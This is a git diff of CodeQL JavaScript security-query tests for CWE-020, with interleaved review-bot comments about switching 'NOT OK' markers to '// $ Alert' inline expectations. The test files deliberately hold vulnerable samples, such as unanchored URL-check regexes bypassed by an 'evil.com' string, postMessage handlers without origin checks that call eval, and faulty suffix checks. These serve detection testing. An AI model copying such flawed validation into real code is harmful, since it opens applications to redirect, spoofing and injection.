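Review bot: In the `tst-IncompleteHostnameRegExp.js` hunk (`@@ -44,7 +44,7 @@`), `/^(example.dev|example.com)/` loses its `// OK` and is left with no comment, although both alternatives contain an unescaped `.`, the same shape that the neighbouring lines mark `// $ Alert`. An unescaped `.` matches any character, so the pattern is looser than the hostnames it spells out, and without a comment a reader cannot tell whether the absent alert is a deliberate exclusion or a gap in the query. If it is deliberate, keep an explanation in the style of the next hunk, e.g. `// OK - <reason the query skips this pattern>`; if it is a known false negative, mark it `// $ MISSING: Alert`.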
@@ -55,8 +55,8 @@ new RegExp('^http://test\.example.com'); // $ Alert - /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK, wildcards are intentional - /^http:\/\/.\.example\.com\/index\.html/; // OK, the wildcard is intentional + /^http:\/\/(..|...)\.example\.com\/index\.html/; // OK - wildcards are intentional + /^http:\/\/.\.example\.com\/index\.html/; // OK - the wildcard is intentional /^(foo.example\.com|whatever)$/; // $ Alert (but kinda OK - one disjunction doesn't even look like a hostname) if (s.matchAll("^http://test.example.com")) {} // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js index a4c6ed190f8f..964b9d23b0e9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSchemeCheck/IncompleteUrlSchemeCheck.js @@ -41,7 +41,7 @@ function test5(url) { function test6(url) { let protocol = new URL(url).protocol; - if (badProtocolsGood.includes(protocol)) // OK + if (badProtocolsGood.includes(protocol)) return "about:blank"; return url; } @@ -113,7 +113,7 @@ function chain1(url) { } function chain2(url) { - return url // OK + return url .replace(/javascript:/, "") .replace(/data:/, "") .replace(/vbscript:/, ""); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js index f719a0835a6d..61d4006886bc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js 
+++ b/javascript/ql/test/query-tests/Security/CWE-020/IncompleteUrlSubstringSanitization/tst-IncompleteUrlSubstringSanitization.js @@ -40,8 +40,8 @@ x.indexOf("index.php") !== -1; x.indexOf("index.css") !== -1; - x.indexOf("secure=true") !== -1; // OK (query param) - x.indexOf("&auth=") !== -1; // OK (query param) + x.indexOf("secure=true") !== -1; // OK - query param + x.indexOf("&auth=") !== -1; // OK - query param x.indexOf(getCurrentDomain()) !== -1; // $ MISSING: Alert x.indexOf(location.origin) !== -1; // $ MISSING: Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref index f9eb315d150f..04e603e63d42 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/IncorrectSuffixCheck.qlref @@ -1 +1,2 @@ -Security/CWE-020/IncorrectSuffixCheck.ql +query: Security/CWE-020/IncorrectSuffixCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js index 0b60fec15383..55e9a7d37611 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/examples/IncorrectSuffixCheck.js @@ -1,3 +1,3 @@ function endsWith(x, y) { - return x.lastIndexOf(y) === x.length - y.length; + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js index f50c014b1853..bd9ef71514b5 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/IncorrectSuffixCheck/tst.js 
@@ -1,70 +1,70 @@ function endsWith(x, y) { - return x.indexOf(y) === x.length - y.length; // NOT OK + return x.indexOf(y) === x.length - y.length; // $ Alert } function endsWithGood(x, y) { - return x.length >= y.length && x.indexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.indexOf(y) === x.length - y.length; } function withStringConcat(x, y) { - return x.indexOf("/" + y) === x.length - y.length - 1; // NOT OK + return x.indexOf("/" + y) === x.length - y.length - 1; // $ Alert } function withStringConcatGood(x, y) { - return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; // OK + return x.length > y.length && x.indexOf("/" + y) === x.length - y.length - 1; } function withDelta(x, y) { let delta = x.length - y.length; - return x.indexOf(y) === delta; // NOT OK + return x.indexOf(y) === delta; // $ Alert } function withDeltaGood(x, y) { let delta = x.length - y.length; - return delta >= 0 && x.indexOf(y) === delta; // OK + return delta >= 0 && x.indexOf(y) === delta; } function literal(x) { - return x.indexOf("example.com") === x.length - "example.com".length; // NOT OK + return x.indexOf("example.com") === x.length - "example.com".length; // $ Alert } function literalGood(x) { return x.length >= "example.com".length && x.indexOf("example.com") === x.length - "example.com".length; } function intLiteral(x) { - return x.indexOf("example.com") === x.length - 11; // NOT OK + return x.indexOf("example.com") === x.length - 11; // $ Alert } function intLiteralGood(x) { return x.length >= 11 && x.indexOf("example.com") === x.length - 11; } function lastIndexOf(x, y) { - return x.lastIndexOf(y) === x.length - y.length; // NOT OK + return x.lastIndexOf(y) === x.length - y.length; // $ Alert } function lastIndexOfGood(x, y) { - return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; // OK + return x.length >= y.length && x.lastIndexOf(y) === x.length - y.length; } function withIndexOfCheckGood(x, y) { let index 
= x.indexOf(y); - return index !== -1 && index === x.length - y.length - 1; // OK + return index !== -1 && index === x.length - y.length - 1; } function indexOfCheckEquality(x, y) { - return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) !== -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckEqualityBad(x, y) { - return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) !== 0 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function indexOfCheckGood(x, y) { - return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) >= 0 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckGoodSharp(x, y) { - return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; // OK + return x.indexOf(y) > -1 && x.indexOf(y) === x.length - y.length - 1; } function indexOfCheckBad(x, y) { - return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // NOT OK + return x.indexOf(y) >= -1 && x.indexOf(y) === x.length - y.length - 1; // $ Alert } function endsWithSlash(x) { 
@@ -73,39 +73,39 @@ function endsWithSlash(x) { function withIndexOfCheckBad(x, y) { let index = x.indexOf(y); - return index !== 0 && index === x.length - y.length - 1; // NOT OK + return index !== 0 && index === x.length - y.length - 1; // $ Alert } function plus(x, y) { - return x.indexOf("." + y) === x.length - (y.length + 1); // NOT OK + return x.indexOf("." + y) === x.length - (y.length + 1); // $ Alert } function withIndexOfCheckLower(x, y) { let index = x.indexOf(y); - return !(index < 0) && index === x.length - y.length - 1; // OK + return !(index < 0) && index === x.length - y.length - 1; } function withIndexOfCheckLowerEq(x, y) { let index = x.indexOf(y); - return !(index <= -1) && index === x.length - y.length - 1; // OK + return !(index <= -1) && index === x.length - y.length - 1; } function lastIndexNeqMinusOne(x) { - return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") !== -1 && x.lastIndexOf("example.com") === x.length - "example.com".length; } function lastIndexEqMinusOne(x) { - return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; // OK + return x.lastIndexOf("example.com") === -1 || x.lastIndexOf("example.com") === x.length - "example.com".length; } function sameCheck(allowedOrigin) { const trustedAuthority = "example.com"; const ind = trustedAuthority.indexOf("." + allowedOrigin); - return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; // OK + return ind > 0 && ind === trustedAuthority.length - allowedOrigin.length - 1; } function sameConcatenation(allowedOrigin) { const trustedAuthority = "example.com"; - return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." + allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; // OK + return trustedAuthority.indexOf("." + allowedOrigin) > 0 && trustedAuthority.indexOf("." 
+ allowedOrigin) === trustedAuthority.length - allowedOrigin.length - 1; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref index 02296c134e1a..bd895fa2e47e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/MissingOriginCheck.qlref @@ -1 +1,2 @@ -Security/CWE-020/MissingOriginCheck.ql \ No newline at end of file +query: Security/CWE-020/MissingOriginCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js index 6e5c0ce6a14a..8d6af30f773b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingOriginCheck/tst.js @@ -8,7 +8,7 @@ window.onmessage = event => { // OK - good origin check eval(event.data); } -window.onmessage = event => { // NOT OK - no origin check +window.onmessage = event => { // $ Alert - no origin check let origin = event.origin.toLowerCase(); console.log(origin); @@ -21,7 +21,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; @@ -37,7 +37,7 @@ window.onmessage = event => { // OK - there is an origin check } } -self.onmessage = function(e) { // NOT OK +self.onmessage = function(e) { // $ Alert Commands[e.data.cmd].apply(null, e.data.args); }; 
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref index 5860f4b3a82a..a762ad6f8385 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/MissingRegExpAnchor.qlref @@ -1 +1,2 @@ -Security/CWE-020/MissingRegExpAnchor.ql \ No newline at end of file +query: Security/CWE-020/MissingRegExpAnchor.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js index 7a5618f88ec7..6fc6d6296204 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-SemiAnchoredRegExp.js 
@@ -1,76 +1,76 @@ (function coreRegExp() { /^a|/; - /^a|b/; // NOT OK + /^a|b/; // $ Alert /a|^b/; /^a|^b/; - /^a|b|c/; // NOT OK + /^a|b|c/; // $ Alert /a|^b|c/; /a|b|^c/; /^a|^b|c/; /(^a)|b/; - /^a|(b)/; // NOT OK + /^a|(b)/; // $ Alert /^a|(^b)/; - /^(a)|(b)/; // NOT OK + /^(a)|(b)/; // $ Alert - /a|b$/; // NOT OK + /a|b$/; // $ Alert /a$|b/; /a$|b$/; - /a|b|c$/; // NOT OK + /a|b|c$/; // $ Alert /a|b$|c/; /a$|b|c/; /a|b$|c$/; /a|(b$)/; - /(a)|b$/; // NOT OK + /(a)|b$/; // $ Alert /(a$)|b$/; - /(a)|(b)$/; // NOT OK + /(a)|(b)$/; // $ Alert - /^good.com|better.com/; // NOT OK - /^good\.com|better\.com/; // NOT OK - /^good\\.com|better\\.com/; // NOT OK - /^good\\\.com|better\\\.com/; // NOT OK - /^good\\\\.com|better\\\\.com/; // NOT OK + /^good.com|better.com/; // $ Alert + /^good\.com|better\.com/; // $ Alert + /^good\\.com|better\\.com/; // $ Alert + /^good\\\.com|better\\\.com/; // $ Alert + /^good\\\\.com|better\\\\.com/; // $ Alert - /^foo|bar|baz$/; // NOT OK - /^foo|%/; // OK + /^foo|bar|baz$/; // $ Alert + /^foo|%/; }); (function coreString() { new RegExp("^a|"); - new RegExp("^a|b"); // NOT OK + new RegExp("^a|b"); // $ Alert new RegExp("a|^b"); new RegExp("^a|^b"); - new RegExp("^a|b|c"); // NOT OK + new RegExp("^a|b|c"); // $ Alert new RegExp("a|^b|c"); new RegExp("a|b|^c"); new RegExp("^a|^b|c"); new RegExp("(^a)|b"); - new RegExp("^a|(b)"); // NOT OK + new RegExp("^a|(b)"); // $ Alert new RegExp("^a|(^b)"); - new RegExp("^(a)|(b)"); // NOT OK + new RegExp("^(a)|(b)"); // $ Alert - new RegExp("a|b$"); // NOT OK + new RegExp("a|b$"); // $ Alert new RegExp("a$|b"); new RegExp("a$|b$"); - new RegExp("a|b|c$"); // NOT OK + new RegExp("a|b|c$"); // $ Alert new RegExp("a|b$|c"); new RegExp("a$|b|c"); new RegExp("a|b$|c$"); new RegExp("a|(b$)"); - new RegExp("(a)|b$"); // NOT OK + new RegExp("(a)|b$"); // $ Alert new RegExp("(a$)|b$"); - new RegExp("(a)|(b)$"); // NOT OK + new RegExp("(a)|(b)$"); // $ Alert - new RegExp('^good.com|better.com'); // NOT OK - 
new RegExp('^good\.com|better\.com'); // NOT OK - new RegExp('^good\\.com|better\\.com'); // NOT OK - new RegExp('^good\\\.com|better\\\.com'); // NOT OK - new RegExp('^good\\\\.com|better\\\\.com'); // NOT OK + new RegExp('^good.com|better.com'); // $ Alert + new RegExp('^good\.com|better\.com'); // $ Alert + new RegExp('^good\\.com|better\\.com'); // $ Alert + new RegExp('^good\\\.com|better\\\.com'); // $ Alert + new RegExp('^good\\\\.com|better\\\\.com'); // $ Alert }); (function realWorld() { @@ -79,23 +79,23 @@ /* * NOT OK: flagged */ - /(\.xxx)|(\.yyy)|(\.zzz)$/; + /(\.xxx)|(\.yyy)|(\.zzz)$/; // $ Alert /(^left|right|center)\sbottom$/; // not flagged at the moment due to interior anchors - /\.xxx|\.yyy|\.zzz$/ig; - /\.xxx|\.yyy|zzz$/; + /\.xxx|\.yyy|\.zzz$/ig; // $ Alert + /\.xxx|\.yyy|zzz$/; // $ Alert /^([A-Z]|xxx[XY]$)/; // not flagged at the moment due to interior anchors - /^(xxx yyy zzz)|(xxx yyy)/i; - /^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; - /^(xxx:)|(yyy:)|(zzz:)/; - /^(xxx?:)|(yyy:zzz\/)/; - /^@media|@page/; - /^\s*(xxx?|yyy|zzz):|xxx:yyy\//; - /^click|mouse|touch/; - /^http:\/\/good\.com|http:\/\/better\.com/; - /^https?:\/\/good\.com|https?:\/\/better\.com/; - /^mouse|touch|click|contextmenu|drop|dragover|dragend/; - /^xxx:|yyy:/i; - /_xxx|_yyy|_zzz$/; + /^(xxx yyy zzz)|(xxx yyy)/i; // $ Alert + /^(xxx yyy zzz)|(xxx yyy)|(1st( xxx)? yyy)|xxx|1st/i; // $ Alert + /^(xxx:)|(yyy:)|(zzz:)/; // $ Alert + /^(xxx?:)|(yyy:zzz\/)/; // $ Alert + /^@media|@page/; // $ Alert + /^\s*(xxx?|yyy|zzz):|xxx:yyy\//; // $ Alert + /^click|mouse|touch/; // $ Alert + /^http:\/\/good\.com|http:\/\/better\.com/; // $ Alert + /^https?:\/\/good\.com|https?:\/\/better\.com/; // $ Alert + /^mouse|touch|click|contextmenu|drop|dragover|dragend/; // $ Alert + /^xxx:|yyy:/i; // $ Alert + /_xxx|_yyy|_zzz$/; // $ Alert /em|%$/; // not flagged at the moment due to the anchor not being for letters /* 
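Review bot: In the `realWorld` hunk, the two lines commented `// not flagged at the moment due to interior anchors` (`/(^left|right|center)\sbottom$/` and `/^([A-Z]|xxx[XY]$)/`) stay as free-text notes while every flagged line around them becomes a machine-checked `// $ Alert`. With inline expectations an unmarked line reads as "expected clean", so these known gaps in a semi-anchored-regex check are no longer visible to the test. If they are results the query should eventually produce, `// $ MISSING: Alert - interior anchors` would record that and fail once the behaviour changes. The block header `NOT OK: flagged` above them still uses the old vocabulary and could be reworded to match. `realWorld` starts before this hunk and continues past it.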
diff --git a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js index c0c5ecb3e3e0..179273ee4502 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/MissingRegExpAnchor/tst-UnanchoredUrlRegExp.js 
@@ -1,29 +1,29 @@ (function(x){ - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".match("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match(/^https?:\/\/good.com/)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".match("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor - /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // NOT OK - new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // NOT OK + /https?:\/\/good.com/.exec("http://evil.com/?http://good.com"); // $ Alert + new RegExp("https?://good.com").exec("http://evil.com/?http://good.com"); // $ Alert - if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // NOT OK + if ("http://evil.com/?http://good.com".search("https?://good.com") > -1) {} // $ Alert - new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // NOT OK + new RegExp("https?://good.com").test("http://evil.com/?http://good.com"); // 
$ Alert - if ("something".match("other")) {} // OK - if ("something".match("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // NOT OK + if ("something".match("other")) {} + if ("something".match("x.commissary")) {} + if ("http://evil.com/?http://good.com".match("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".match("https?://good.com:8080")) {} // $ Alert let trustedUrls = [ - "https?://good.com", // NOT OK, referenced below - /https?:\/\/good.com/, // NOT OK, referenced below - new RegExp("https?://good.com"), // NOT OK, referenced below - "^https?://good.com" // NOT OK - missing post-anchor + "https?://good.com", // $ Alert - referenced below + /https?:\/\/good.com/, // $ Alert - referenced below + new RegExp("https?://good.com"), // $ Alert - referenced below + "^https?://good.com" // $ Alert - missing post-anchor ]; function isTrustedUrl(url) { for (let trustedUrl of trustedUrls) { @@ -32,10 +32,10 @@ return false; } - /https?:\/\/good.com\/([0-9]+)/.exec(url); // NOT OK - "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; // OK - "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // OK + /https?:\/\/good.com\/([0-9]+)/.exec(url); // $ Alert + "https://verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + "verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]; + "http" + (secure? "s": "") + "://" + ("verygood.com/?id=" + /https?:\/\/good.com\/([0-9]+)/.exec(url)[0]); // g or .replace? file = file.replace( 
@@ -46,7 +46,7 @@ // missing context of use const urlPatterns = [ { - regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, // OK + regex: /youtube.com\/embed\/([a-z0-9\?&=\-_]+)/i, type: 'iframe', w: 560, h: 314, url: '//www.youtube.com/embed/$1', allowFullscreen: true @@ -74,7 +74,7 @@ var urlPatterns = [ {regex: /youtu\.be\/([\w\-.]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$1'}, {regex: /youtube\.com(.+)v=([^&]+)/, type: 'iframe', w: 425, h: 350, url: '//www.youtube.com/embed/$2'}, - {regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, + {regex: /vimeo\.com\/([0-9]+)/, type: 'iframe', w: 425, h: 350, url: '//player.vimeo.com/video/$1?title=0&byline=0&portrait=0&color=8dc7dc'}, // $ Alert ]; // check optional successsor to TLD 
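Review bot: The `// $ Alert` added to the `/vimeo\.com\/([0-9]+)/` entry pins a result that the neighbouring `youtu\.be` and `youtube\.com` entries in the same array do not get, and the line had no NOT OK marker before this change, so nothing states whether the alert is wanted. If it is intended, a reason in the style used elsewhere in this file would help, e.g. `// $ Alert - unanchored host pattern`. If it is a known false positive, `// $ SPURIOUS: Alert` keeps the test passing while recording that. The `urlPatterns` array begins before this hunk and ends after it.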
@@ -103,29 +103,29 @@ // replace path.replace(/engine.io/, "$&-client"); - /\.com|\.org/; // OK, has no domain name - /example\.com|whatever/; // OK, the other disjunction doesn't match a hostname + /\.com|\.org/; // OK - has no domain name + /example\.com|whatever/; // OK - the other disjunction doesn't match a hostname // MatchAll test cases: // Vulnerable patterns - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // NOT OK - missing post-anchor - if ("http://evil.com/?http://good.com".matchAll("good.com")) {} // NOT OK - missing protocol - if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // NOT OK - if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // NOT OK + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll(new RegExp("https?://good.com"))) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com/g)) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com)|(^https?://good2.com)")) {} // $ Alert - missing post-anchor + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com)|(^https?://goodie.com)")) {} // $ Alert - missing post-anchor + if 
("http://evil.com/?http://good.com".matchAll("good.com")) {} // $ Alert - missing protocol + if ("http://evil.com/?http://good.com".matchAll("https?://good.com")) {} // $ Alert + if ("http://evil.com/?http://good.com".matchAll("https?://good.com:8080")) {} // $ Alert // Non-vulnerable patterns - if ("something".matchAll("other")) {} // OK - if ("something".matchAll("x.commissary")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} // OK - if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} // OK - if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} // OK - if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} // OK + if ("something".matchAll("other")) {} + if ("something".matchAll("x.commissary")) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com$")) {} + if ("http://evil.com/?http://good.com".matchAll(new RegExp("^https?://good.com$"))) {} + if ("http://evil.com/?http://good.com".matchAll("^https?://good.com/$")) {} + if ("http://evil.com/?http://good.com".matchAll(/^https?:\/\/good.com\/$/)) {} + if ("http://evil.com/?http://good.com".matchAll("(^https?://good1.com$)|(^https?://good2.com$)")) {} + if ("http://evil.com/?http://good.com".matchAll("(https?://good.com$)|(^https?://goodie.com$)")) {} }); diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref index 77b5c92707f9..c42315c4550e 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref 
+++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/OverlyLargeRangeQuery.qlref @@ -1 +1,2 @@ -Security/CWE-020/OverlyLargeRange.ql +query: Security/CWE-020/OverlyLargeRange.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js index 913922271bb3..ef4bd7e9ca7f 100644 --- a/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-020/SuspiciousRegexpRange/tst.js 
@@ -1,34 +1,34 @@ -var overlap1 = /^[0-93-5]$/; // NOT OK +var overlap1 = /^[0-93-5]$/; // $ Alert -var overlap2 = /[A-ZA-z]/; // NOT OK +var overlap2 = /[A-ZA-z]/; // $ Alert -var isEmpty = /^[z-a]$/; // NOT OK +var isEmpty = /^[z-a]$/; // $ Alert -var isAscii = /^[\x00-\x7F]*$/; // OK +var isAscii = /^[\x00-\x7F]*$/; var printable = /[!-~]/; // OK - used to select most printable ASCII characters -var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; // OK +var codePoints = /[^\x21-\x7E]|[[\](){}<>/%]/g; -const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; // OK +const NON_ALPHANUMERIC_REGEXP = /([^\#-~| |!])/g; -var smallOverlap = /[0-9a-fA-f]/; // NOT OK +var smallOverlap = /[0-9a-fA-f]/; // $ Alert -var weirdRange = /[$-`]/; // NOT OK +var weirdRange = /[$-`]/; // $ Alert -var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // NOT OK +var keywordOperator = /[!\~\*\/%+-<>\^|=&]/; // $ Alert -var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // NOT OK +var notYoutube = /youtu\.be\/[a-z1-9.-_]+/; // $ Alert -var numberToLetter = /[7-F]/; // NOT OK +var numberToLetter = /[7-F]/; // $ Alert -var overlapsWithClass1 = /[0-9\d]/; // NOT OK +var overlapsWithClass1 = /[0-9\d]/; // $ Alert -var overlapsWithClass2 = /[\w,.-?:*+]/; // NOT OK +var overlapsWithClass2 = /[\w,.-?:*+]/; // $ Alert -var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; // OK -var tst3 = /[0-90-9]/; // OK +var tst2 = /^([ァ-ヾ]|[ァ-ン゙゚])+$/; +var tst3 = /[0-90-9]/; -var question = /[0-?]/; // OK. matches one of: 0123456789:;<=>? +var question = /[0-?]/; // OK - matches one of: 0123456789:;<=>? -var atToZ = /[@-Z]/; // OK. matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file +var atToZ = /[@-Z]/; // OK - matches one of: @ABCDEFGHIJKLMNOPQRSTUVWXYZ \ No newline at end of file 
